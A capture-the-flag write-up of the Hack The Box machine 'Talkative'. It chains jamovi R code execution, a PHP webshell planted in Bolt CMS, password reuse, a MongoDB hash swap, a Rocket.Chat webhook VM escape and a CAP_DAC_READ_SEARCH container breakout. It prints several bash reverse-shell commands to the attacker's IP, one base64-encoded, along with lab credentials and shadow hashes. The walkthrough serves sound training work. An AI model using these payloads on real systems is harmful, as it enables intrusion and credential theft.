# Talkative - HTB

[[_TOC_]]

## Summary

<div align="center"><img width="560" height="424" src="images/0.png"></div>

Talkative is a magnificent hard-rated machine created by [TheCyberGeek](https://twitter.com/thecybergeek19) and [JDgodd](https://twitter.com/Janit10043163)  
It is enormous, elaborate and involves lots of steps.

The machine has three exposed services: a website that uses Bolt CMS, a web-based version of `jamovi` and a `Rocket.Chat` instance.  
We start by exploiting a `jamovi` module and get a shell inside a docker container. From that container, we can exfiltrate some credentials.  
One of the passwords works on Bolt CMS login, and we can modify a PHP page there to get OS command execution. It brings us a shell in another container, and we can SSH to the docker host from there, using the same password (SSH port on host is filtered). It gets us the user flag.  
For root, we start by modifying the admin credentials on a `mongodb` instance running on yet another container. This database is used by `Rocket.Chat` and allows us to log in as admin. Then we can use the `Rocket.Chat` Integration feature to get a shell inside another container.  
This final container has a dangerous capability: `CAP_DAC_READ_SEARCH`, and we can use the `shocker` exploit to break out of the container.

## Initial recon

```console
opcode@parrot$ nmap -p- 10.10.11.155
Nmap scan report for 10.10.11.155
Host is up (0.23s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3000/tcp open     ppp
8080/tcp open     http-proxy
8081/tcp open     blackice-icecap
8082/tcp open     blackice-alerts
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80,3000,8080,8081,8082 -oN talkative.nmap 10.10.11.155
Nmap scan report for 10.10.11.155
Host is up (0.25s latency).

PORT     STATE    SERVICE VERSION
22/tcp   filtered ssh
80/tcp   open     http            Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://talkative.htb
|_http-server-header: Apache/2.4.52 (Debian)
3000/tcp open     ppp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-XSS-Protection: 1
|     X-Instance-ID: o4cmDHwDXE6oTJNJj
|     Content-Type: text/html; charset=utf-8
|     Vary: Accept-Encoding
[--SNIP--]
8080/tcp open     http    Tornado httpd 5.0
|_http-title: jamovi
|_http-server-header: TornadoServer/5.0
8081/tcp open     http    Tornado httpd 5.0
|_http-title: 404: Not Found
|_http-server-header: TornadoServer/5.0
8082/tcp open     http    Tornado httpd 5.0
|_http-title: 404: Not Found
|_http-server-header: TornadoServer/5.0
```

It is somewhat chaotic.  
Port 22 (SSH) is filtered.  

To access port 80, we need to add `10.10.11.155 talkative.htb` to `/etc/hosts`  
The website seems like a standard organization page. We can find an URL to https://boltcms.io/ on the footer, and visiting http://talkative.htb/bolt/login gets us to Bolt CMS login page.  

## Rocket.Chat NoSQL Injection - Failure

If we visit port 3000, we will find Rocket.Chat running there. We can freely register an account and log in there.

We can find the version:
```console
opcode@parrot$ curl http://talkative.htb:3000/api/info
{"version":"2.4.14","success":true}
```

This seems to be rather old. If we google around for vulnerabilities, we'll find a notable article from SonarSource here: https://blog.sonarsource.com/nosql-injections-in-rocket-chat/

It's a chain of multiple vulnerabilities, the first being CVE-2021-22911: a Blind NoSQL Injection that allows leaking a user’s password reset token.  
We don't need this one as we can already create an account as a regular user.  
The second vulnerability is Rocket.Chat Security Issue 0025: It is another NoSQL injection that requires authentication but can leak any user's fields in the database.  
It seems just like the thing we need. (There is another account: Saul Goodman, and it has the handle `@admin` that we need to take over)

The API reference for Rocket.Chat can be found here: https://developer.rocket.chat/reference/api/rest-api

Let's grab our `Auth-Token` and `User-Id` first:
```console
opcode@parrot$ curl -X POST -H "Content-type:application/json" http://talkative.htb:3000/api/v1/login -d '{"username":"opcode","password":"opcode"}' | jq '.data.userId + "  " + .data.authToken'
"se6wrTQ4qDxye8B9W  izDq3yg-lMLZfFCbw9s-LZSIz9auMCNUTMTDyp7peg5"
```

Now, we can get the leaks started:
```console
opcode@parrot$ curl -H "Content-type:application/json" -H "X-Auth-Token:izDq3yg-lMLZfFCbw9s-LZSIz9auMCNUTMTDyp7peg5" -H "X-User-Id:se6wrTQ4qDxye8B9W" http://talkative.htb:3000/api/v1/users.list | jq '.users[].name'
"Saul Goodman"
"opcode"
"Rocket.Cat"
```

Since the payload for NoSQL injection has lots of quotes and special characters, I'd prefer to do it with burp:

![1](images/1.png)

I don't think we can crack this password hash.  
I went to the GUI and used the reset password option with email `saul@talkative.htb`  
Now, we can go and grab the reset token:  

![2](images/2.png)

And we have it:
```
wQgWsrTAxuVeCSG5y4hky8DvfNLfZ1yKIQmAHky17HK
```

Saul does not have 2FA enabled:  

![3](images/3.png)

Now, let us try and reset the password:

![4](images/4.png)

I've been using this PoC from Enox for reference: https://github.com/CsEnox/CVE-2021-22911/blob/main/new_exploit.py  
Sadly, the password reset didn't work, likely due to the differences between version 3.12 and our version 2.4.14  
One possible route here would be to get a docker instance of 2.4.14 running and figure out how to reset the password there.  
But that sounds too much work. I'd like to explore other options first.

## Exploiting `Rj Editor` module on `jamovi`

On port 8080, we have a web-based version of `jamovi` running.  
It has an installed module called `Rj Editor` , which allows use to execute arbitrary `R` code.  
As expected, trying to run `system("whoami")` fails. But googling around, we would find about the `intern` argument.  
```
system("whoami", intern = TRUE)
```
It gives us command execution:
```
 [1] "root"
```

We can now get a reverse shell on the box with:
```
system("bash -c 'bash -i >& /dev/tcp/10.10.14.19/9001 0>&1'", intern = TRUE)
```

We find a file `bolt-administration.omv` inside `/root`.  
`.omv` files are excel-like. We can unzip it and take a peek at `xdata.json`.  
We have a bunch of credentials here:
```
matt@talkative.htb:jeO09ufhWD<s
janit@talkative.htb:bZ89h}V<S_DA
saul@talkative.htb:)SQWGm>9KHEA
```

## Editing a PHP file in Bolt CMS to include webshell

Matt's password works on the Bolt CMS login page with the username `admin`  
In `Configuration > All configuration files`, we have couple of PHP files that we can edit: `config/preload.php` and `config/bundles.php`

I edited the `bundles.php` to include the line `system($_GET[cmd]);`:
```php
<?php

system($_GET[cmd]);

return [
    'ApiPlatform\\Core\\Bridge\\Symfony\\Bundle\\ApiPlatformBundle' => [
        'all' => true,
    ],
    'BabDev\\PagerfantaBundle\\BabDevPagerfantaBundle' => [
        'all' => true,
    ],
    'DAMA\\DoctrineTestBundle\\DAMADoctrineTestBundle' => [
        'test' => true,
[--SNIP--]
```

Now, we can get a shell on the Bolt CMS container through this webshell.  
First, base64 encode the bash reverse shell to avoid + or =
```console
opcode@parrot$ echo 'bash -i  >&  /dev/tcp/10.10.14.19/9001 0>&1 ' | base64
YmFzaCAtaSAgPiYgIC9kZXYvdGNwLzEwLjEwLjE0LjE5LzkwMDEgMD4mMSAK
```
Now, we can get a shell with:
```
http://talkative.htb/?cmd=echo YmFzaCAtaSAgPiYgIC9kZXYvdGNwLzEwLjEwLjE0LjE5LzkwMDEgMD4mMSAK | base64 -d | bash
```

## SSH to filtered port

We have landed inside another docker container.  
Our initial `nmap` scan showed us that port 22 was filtered. But we can SSH to port 22 on the docker host from inside this container.  
By default (on Linux), Docker sets up a `bridge` network and standalone containers bind directly to the Docker host’s network, with no network isolation at all.  
We can connect to a container's network from the docker host or any other container.  
We can use this configuration to our advantage, and SSH to the docker host as Saul with the CMS password (the password is reused for SSH)

If we try to use SSH, it would complain that stdin is not a terminal. To get around that, we can upgrade the shell. Since `python` is not available, we can use `script`:
```console
www-data@fee5a556092f:/var/www$ script /dev/null -c bash
www-data@fee5a556092f:/var/www$ ^Z
[1]  + 2376 suspended  nc -lnvp 9001
opcode@parrot$ stty raw -echo; fg
www-data@fee5a556092f:/var/www$ export TERM=xterm-256color
www-data@fee5a556092f:/var/www$ exec /bin/bash
```

We should be able to SSH now with the password `jeO09ufhWD<s`:
```console
www-data@fee5a556092f:/var/www$ ssh saul@172.17.0.1
```

We are on the docker host as the user `saul` and can read the user flag now.

## Enumerating with statically linked nmap

Apart from the usual enumeration with `pspy` and `linpeas`, I like to enumerate ports with `nmap` on docker containers or docker host.  
For that, I transferred a statically linked `nmap` binary (https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) to the box.

We can use CIDR notation with `nmap` as well:
```console
saul@talkative:~$ ./nmap -p- 172.17.0.1/29
Nmap scan report for 172.17.0.1
Host is up (0.00017s latency).
Not shown: 65518 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
6000/tcp open  x11
6001/tcp open  x11-1
6002/tcp open  x11-2
6003/tcp open  x11-3
6004/tcp open  x11-4
6005/tcp open  x11-5
6006/tcp open  x11-6
6007/tcp open  x11-7
6008/tcp open  unknown
6009/tcp open  unknown
6010/tcp open  unknown
6011/tcp open  unknown
6012/tcp open  unknown
6013/tcp open  unknown
6014/tcp open  unknown
6015/tcp open  unknown
8080/tcp open  http-alt
8081/tcp open  tproxy
8082/tcp open  unknown

Nmap scan report for 172.17.0.2
Host is up (0.00043s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE
27017/tcp open  unknown

Nmap scan report for 172.17.0.3
Host is up (0.00041s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE
3000/tcp open  unknown

Nmap scan report for 172.17.0.4
Host is up (0.00016s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.5
Host is up (0.00019s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.6
Host is up (0.00023s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.7
Host is up (0.00025s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 8 IP addresses (7 hosts up) scanned in 18.53 seconds
```

It seems that containers with addresses 172.17.0.4 and onwards host Bolt CMS, and are there for load balancing.  
172.17.0.3 is Rocket.Chat  
172.17.0.2 is interesting.

```console
saul@talkative:~$ curl 172.17.0.2:27017
It looks like you are trying to access MongoDB over HTTP on the native driver port.
```
It's serving MongoDB. If curl didn't give us any information, we could have used port forwarded and ran `nmap` with `-sC` and `-sV` options.

## Modifying MongoDB fields

We need to transfer `chisel` to the box and do a port forwarding.  
First, locally:
```console
opcode@parrot$ ./chisel server -p 9999 --reverse -v
```
Now, on the box:
```console
saul@talkative:~$ ./chisel client 10.10.14.19:9999 R:27017:172.17.0.2:27017
```
We should be able to access the service on 127.0.0.1:27017 on our system now.  
To interact with it, we need to get the MongoDB shell: `mongosh`  
I got it from https://www.mongodb.com/try/download/shell after selecting the Linux Tarball 64-bit as the platform

```console
opcode@parrot$ ./mongosh --port 27017
```

```console
rs0 [direct: primary] test> show databases
admin   104.00 KiB
config  160.00 KiB
local    13.07 MiB
meteor    5.30 MiB
```
`meteor` is the one with Rocket.Chat data

Let's look at the tables:
```console
rs0 [direct: primary] test> use meteor
switched to db meteor
rs0 [direct: primary] meteor> show collections
_raix_push_app_tokens
_raix_push_notifications
instances
meteor_accounts_loginServiceConfiguration
meteor_oauth_pendingCredentials
meteor_oauth_pendingRequestTokens
migrations
rocketchat__trash
rocketchat_apps
[--SNIP--]
users
usersSessions
view_livechat_queue_status                 [view]
system.views
```

We can look at the users:
```console
rs0 [direct: primary] meteor> db.users.find().pretty()
[
{
    "_id" : "rocket.cat",
    "createdAt" : ISODate("2021-08-10T19:44:00.224Z"),
    "avatarOrigin" : "local",
    "name" : "Rocket.Cat",
    "username" : "rocket.cat",
    "status" : "online",
    "statusDefault" : "online",
    "utcOffset" : 0,
    "active" : true,
    "type" : "bot",
    "_updatedAt" : ISODate("2021-08-10T19:44:00.615Z"),
    "roles" : [
        "bot"
    ]
}
{
    "_id" : "ZLMid6a4h5YEosPQi",
    "createdAt" : ISODate("2021-08-10T19:49:48.673Z"),
    "services" : {
        "password" : {
            "bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG"
        },
        "resume" : {
            "loginTokens" : [
                {
                    "when" : ISODate("2022-04-14T08:42:50.662Z"),
                    "hashedToken" : "Y/ZpOKKOhZQRPFBlROQjYgRsixomYCJiOQkloxTmSn0="
                }
            ]
        }
    },
    "emails" : [
        {
            "address" : "saul@talkative.htb",
            "verified" : false
        }
    ],
    "type" : "user",
    "status" : "offline",
    "active" : true,
    "_updatedAt" : ISODate("2022-04-14T09:31:26.724Z"),
    "roles" : [
        "admin",
        "bot"
    ],
    "name" : "Saul Goodman",
    "lastLogin" : ISODate("2022-04-14T08:49:26.572Z"),
    "statusConnection" : "offline",
    "username" : "admin",
    "utcOffset" : 0
}
{
    "_id" : "CRrtsZRdjhivrDpev",
    "createdAt" : ISODate("2022-04-14T06:01:16.123Z"),
    "services" : {
        "password" : {
            "bcrypt" : "$2b$10$/gv2CfZRvrFcrTkg0bVowOnvV.ZeGIniHm1GFtnfrh1YgUGUex3RS",
            "reset" : {
                "token" : "kEHn24XBoi1C0MMPXj1LfNk4JBXUvYo7hut7eNtFCYg",
                "email" : "opcode@talkative.htb",
                "when" : ISODate("2022-04-14T06:01:20.378Z"),
                "reason" : "enroll"
            }
        },
        "email" : {
            "verificationTokens" : [
                {
                    "token" : "Lg1DM9g4yfs8_B-ZN0J47JqbbUaKw0tbS5TL793uVyS",
                    "address" : "opcode@talkative.htb",
                    "when" : ISODate("2022-04-14T06:01:16.167Z")
                }
            ]
        },
        "resume" : {
            "loginTokens" : [
                {
                    "when" : ISODate("2022-04-14T06:36:47.704Z"),
                    "hashedToken" : "VKOadm8EZMGtxmNt3lIMwyLUPQBA7YnjB3Xc6hlc48U="
                },
                {
                    "when" : ISODate("2022-04-14T07:01:38.489Z"),
                    "hashedToken" : "Y0MwRfLpUNX8l+loDNZV+EDulE5SleeXhLQENHV8UJU="
                }
            ]
        }
    },
    "emails" : [
        {
            "address" : "opcode@talkative.htb",
            "verified" : false
        }
    ],
    "type" : "user",
    "status" : "offline",
    "active" : true,
    "_updatedAt" : ISODate("2022-04-14T07:52:07.115Z"),
    "roles" : [
        "user"
    ],
    "name" : "opcode",
    "lastLogin" : ISODate("2022-04-14T07:01:38.486Z"),
    "statusConnection" : "offline",
    "utcOffset" : 0,
    "username" : "opcode"
}
]
```

We can easily take over Saul's account by replacing his password hash with ours:
```console
rs0 [direct: primary] meteor> db.users.update({ "_id" : "ZLMid6a4h5YEosPQi" }, { $set: {"services.password.bcrypt": "$2b$10$/gv2CfZRvrFcrTkg0bVowOnvV.ZeGIniHm1GFtnfrh1YgUGUex3RS" } })
DeprecationWarning: Collection.update() is deprecated. Use updateOne, updateMany, or bulkWrite.
{
  acknowledged: true,
  insertedId: null,
  matchedCount: 1,
  modifiedCount: 1,
  upsertedCount: 0
}
```

Now, we can log in to http://talkative.htb:3000/ with:
```
saul@talkative.htb:opcode
```

## RCE with Rocket.Chat integrations

This SonarSource article: https://blog.sonarsource.com/nosql-injections-in-rocket-chat/ mentions a way to get RCE with a Rocket.Chat feature called Integrations which allows the creation of incoming and outgoing webhooks.  
These webhooks can have scripts associated with them that are executed when the webhook is triggered. They are run using the `vm` module of `Node.js`, and we can break out of the VM context to run arbitrary code.  

I'd create a new Incoming Webhook which posts to `@admin` as `@admin` and has the following script:
```js
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('bash -c "/bin/bash -i >& /dev/tcp/10.10.14.25/9001 0>&1"');
```
After saving it, we can grab the webhook URL: http://talkative.htb:3000/hooks/WhEc6a5tzbCEbTRAn/ehgN4GTf4jcEEvkkNozDZvMric7RpW9GrLH2JtcNKTXMbdLM and visit it.  
I was not able to ping myself, but I was able to get a reverse shell. I blame it on the lack of a `ping` binary on the minimal docker container.

## Enumerating minimal docker container

After getting a shell, we need to use `script` again to upgrade it.  
Now, this is a very minimal container with no `curl` or `wget`  
I used a minimal implementation of a curl-like utility from here (https://unix.stackexchange.com/questions/83926/how-to-download-a-file-using-just-bash-and-nothing-else-no-curl-wget-perl-et/421318#421318) to get around that:
```bash
function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}
```

Since we had to hop into a container from the docker host, and we are root in this container, the goal likely is to break out of this container.  
Running `deepce.sh` (https://github.com/stealthcopter/deepce) is not very helpful as utilities like `capsh`, `ps` or `ping` are not present on this container.  

But `cdk` (https://github.com/cdk-team/CDK) is helpful here. Transfer it to the box with:
```console
root@c150397ccd63:~# __curl http://10.10.14.19:8000/cdk > cdk
```

```console
root@c150397ccd63:~# ./cdk eva

[Information Gathering - System Info]
2022/04/14 16:39:54 current dir: /tmp
2022/04/14 16:39:54 current user: root uid: 0 gid: 0 home: /root
2022/04/14 16:39:54 hostname: c150397ccd63
2022/04/14 16:39:54 debian debian 10.10 kernel: 5.4.0-81-generic

[Information Gathering - Services]
2022/04/14 16:39:54 sensitive env found:
	DEPLOY_METHOD=docker-official

[Information Gathering - Commands and Capabilities]
2022/04/14 16:39:54 available commands:
	find,node,npm,apt,dpkg,mount,fdisk,base64,perl
2022/04/14 16:39:54 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	CapInh:	0000000000000000
	CapPrm:	00000000a80425fd
	CapEff:	00000000a80425fd
	CapBnd:	00000000a80425fd
	CapAmb:	0000000000000000
	Cap decode: 0x00000000a80425fd = CAP_CHOWN,CAP_DAC_READ_SEARCH,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
	Add capability list: CAP_DAC_READ_SEARCH
[*] Maybe you can exploit the Capabilities below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[--SNIP--]
```

Indeed, CAP_DAC_READ_SEARCH is a dangerous capability, and the Shocker exploit (https://github.com/duowen1/Container-escape-exps/tree/main/Shocker) can be used for breaking out.  
But I took it easy and used `cdk` to automate it all
```console
root@c150397ccd63:~# ./cdk run cap-dac-read-search
Running with target: /etc/shadow, ref: /etc/hostname
root:$6$9GrOpvcijuCP93rg$tkcyh.ZwH5w9AHrm66awD9nLzMHv32QqZYGiIfuLow4V1PBkY0xsKoyZnM3.AI.yGWfFLOFDSKsIR9XnKLbIY1:19066:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sys:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
news:*:18659:0:99999:7:::
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:99999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:99999:7:::
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump:*:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18849:0:99999:7:::
sshd:*:18849:0:99999:7:::
systemd-coredump:!!:18849::::::
lxd:!:18849::::::
saul:$6$19rUyMaBLt7.CDGj$ik84VX1CUhhuiMHxq8hSMjKTDMxHt.ldQC15vFyupafquVyonyyb3/S6MO59tnJHP9vI5GMvbE9T4TFeeeKyg1:19058:0:99999:7:::
```

We can read the root flag with:
```console
root@c150397ccd63:~# ./cdk run cap-dac-read-search /etc/hosts /root/root.txt
Running with target: /root/root.txt, ref: /etc/hosts
b8b1a978830d0ee4373bb447940c3dfd
```

We can also get a shell as root:
```console
root@c150397ccd63:~# ./cdk run cap-dac-read-search /etc/hosts /
Running with target: /, ref: /etc/hosts
executing command(/bin/bash)...
root@c150397ccd63:/# ls /home/saul/
user.txt
root@c150397ccd63:/# ls /root/
root.txt
```
